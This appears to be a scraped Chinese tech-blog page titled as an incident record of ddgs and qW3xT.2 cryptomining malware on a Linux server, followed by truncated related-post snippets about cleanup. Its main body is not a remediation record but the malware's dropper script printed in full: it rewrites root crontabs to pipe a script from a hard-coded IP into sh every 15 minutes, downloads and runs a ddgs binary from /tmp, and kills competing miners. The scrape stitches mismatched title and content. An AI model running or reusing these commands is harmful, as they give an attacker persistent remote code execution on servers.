2. 程式人生 > >linux 伺服器被植入ddgs、qW3xT.2挖礦病毒處理記錄

linux 伺服器被植入ddgs、qW3xT.2挖礦病毒處理記錄

阿新 發佈:2018-12-09 
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

相關推薦

linux 伺服器植入ddgsqW3xT.2病毒處理記錄

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.s

qW3xT.2病毒指令碼解析

最近有兩臺阿里雲伺服器中了挖礦病毒,CPU佔用率一直百分百。本帖就不詳細說明如何清除了,網上很多資源。由於好奇,我把該病毒的定時指令碼給下載下來,大家可以學習一下。 中了招的主機,在計劃任務中都有這麼一段: */15 * * * * curl -fsSL http://149.56.106.

智慧一代雲平臺(十六):解決Linux伺服器植入木馬總結

【前言】     繼上次Redis伺服器被劫持風暴(高校雲平臺(十三):Redis伺服器被劫持風波)過後十多天後,病毒對我們總是戀戀不捨,又一次的來到我們身邊;有了上次的經驗後,這次處理起來雖然也有些

伺服器病毒處理之二 --------bin/x7程序開機自啟動

雲伺服器挖礦病毒處理之一 --------kworker和netfs異常 上面之一是我遇到的第一個問題,當時以為解決了,但發現其中有三臺機器只要啟動後就會有bin/x7程式,很是頑固。 重啟後就有問題,我查看了所有cron*的檔案顯示都正常的,然後再看了一下/etc/init.d裡面的檔

伺服器病毒處理之一 --------kworker和netfs異常

最近這幾天公司有個專案組的機器中毒了,而且很嚴重,看了一下中毒日期發現是10月18號就被入侵了。前段時間就有問題他們沒被重視,這幾填記憶體佔用太恐怖了特別是在夜晚自動啟動,程序定點在0點到8點啟動 程序檢視: 使用clamscn進行病毒掃描(具體Clamscn的具體介紹可以使

伺服器病毒處理之一 --------kworker和netfs異常

最近這幾天公司有個專案組的機器中毒了,而且很嚴重,看了一下中毒日期發現是10月18號就被入侵了。前段時間就有問題他們沒被重視,這幾填記憶體佔用太恐怖了特別是在夜晚自動啟動,程序定點在0點到8點啟動 程序檢視: 好吧,中了木馬和後門全部中招了 然後用c

linux服務植入(2t3ik與ddgs)解決方式

已處理過多臺伺服器,目前沒再被植入挖礦,按照以下步驟可行: 1、安裝防毒軟體ClamAV 2、刪除挖礦植入的程式碼、定時任務 a、檢視佔有記憶體高的程序, top b、刪除對應的程序 kill -9 ID c、刪除tmp下對應的檔案 rm -rf  /tm

Linux伺服器黑客攻擊,安全檢查方法

一、檢查系統密碼檔案,檢視檔案修改日期 # ls -l /etc/passwd   二、檢視 passwd 檔案中有哪些特權使用者 # awk -F: '$3==0 {print $1}' /etc/passwd   三、檢視系統裡有沒有空口令帳戶 #

Linux伺服器程式sustse和kworkerds感染後續處理

在上一篇博文Linux系統發現佔用CPU達100%的程序並處理 裡面以為已經把挖礦程式sustse處理乾淨了,可是沒過兩天又收到阿里雲簡訊提醒,說伺服器有問題,難道還有後門嗎?也多虧阿里雲給出提示“出現了可疑安全事件:Linux共享庫檔案預載入配置檔案可疑篡改”。網上查了查相關內容,原來這個

Mac連線Linux伺服器並上傳解壓檔案

       由於工作原因,要求在Linux伺服器沒網路的情況下部署專案——首先我要做的是將相關檔案上傳至伺服器。我在網上搜了很多相關資料,結合自身實際情況,整理出我所做的步驟,以供參考。 目的:Mac連線上Linux伺服器,並將檔案上傳至Linux伺服器

Linux 伺服器下解壓壓縮命令

1.壓縮命令:    命令格式:tar  -zcvf   壓縮檔名.tar.gz   被壓縮檔名       2.解壓縮命令:   命令格式:tar  -zxvf &nb

Linux伺服器黑遭敲詐,3小時緊急逆襲!

作者介紹 陳浩,北信源研發工程師,五年Linux運維工作經驗,熱衷運維技術研究、實踐和團隊分享。 1.起因 本來在家正常休息了,我們放在上海託管機房的線上伺服器突然崩了遠端不了,服務啟動不了,然後讓上海機房重啟了一次,還是直接掛了,一直到我遠端上才行。 2.現象 遠端伺服器發現出現這類資訊 Hi, 

Mac連線Linux伺服器並上傳下載解壓檔案

文章轉載  點選開啟連結的部落格文章,我收藏筆記方便以後使用,並在基礎上記錄從伺服器上下載檔案方法。 由於工作原因,要求在Linux伺服器沒網路的情況下部署專案——首先我要做的是將相關檔案上傳至伺服器。我在網上搜了很多相關資料,結合自身實際情況,整理出我所做的步驟,以供

Linux伺服器下搭建JDKTomcat環境和部署web應用

1、下載JDK和Tomcat 2、jdk安裝與配置 1)jdk安裝  rpm包:     # rpm -ivh jdk-7u55-linux-x64.rpm  tar.gz包:解壓縮     #

記一次linux伺服器攻擊的處理經歷

首先發現IO、流量異常。查詢登入記錄,果不其然last命令沒有結果,/var/log/wtmp檔案被刪除。查詢/var/log/secure檔案中的登入記錄:grep "Accept" /var/log/secure查dstat的日誌檔案,正是10:51分開始出現IO異常。用

linux伺服器硬體資源指標jvm監控 儲存資料庫redis監控

linux 監控命令 nmon dstat  top iostat vmstat iftop iotop lsof netstat 伺服器硬體資源指標(cpu、記憶體、磁碟、網路) dstat top iotop  iostat  vmstat  Iostat/iotop:

SSH工具連線Linux伺服器拒絕

我前兩天天搭了一個Linux伺服器6.9版本的,用Xshell連線上也沒問題。但是今天下午突然連線不上了 以下是錯誤截圖: 後來我就上網查,網上說的什麼IP地址不固定、dns不固定,然後還有改檔案的都不行。 最後查到解決辦法: 首先你要需要登入到你的

linux伺服器掛馬,ps命令netstat命令挾持替換成其他程式

公司一套hadoop叢集,裝的CDH CM,被掛馬了,動不動就特別卡,流量佔用特別高。當初為了方便,裸在公網上了。而且密碼還簡單,這下是血的教訓了。雖然上面已經同意了全部重灌了,但是本屌有點不甘心,想了解該病毒的老窩在哪。下面會一些資訊,分享給大家。 問題現象,lin

解決病毒占用cpu以及誤刪 ld-linux-x86-64.so.2 文件的問題

轉移 第一條 根目錄 man bios 原本 光盤 防止 隱藏權限 上次已經被抓去挖礦了當了一次曠工了,本以為解決了,沒想到竟然死灰復燃。 這次占用cpu的依然是一個ld-linux的進程,kill掉之後同樣就查了關於test用戶的進程,果然,test用戶的進程有100+個

qW3xT.2,解決病毒

創建 exp tab -a 在服務器 守護 root 服務 tmp目錄 首先殺死進程: 1.首先,將 CPU 占滿的進程殺死 2.它有一個 守護進程 ps -aux|grep ddg 刪除文件: 1.進入/tmp文件夾下。發現qW3xT.2文件,刪除。 2.刪除/tmp目錄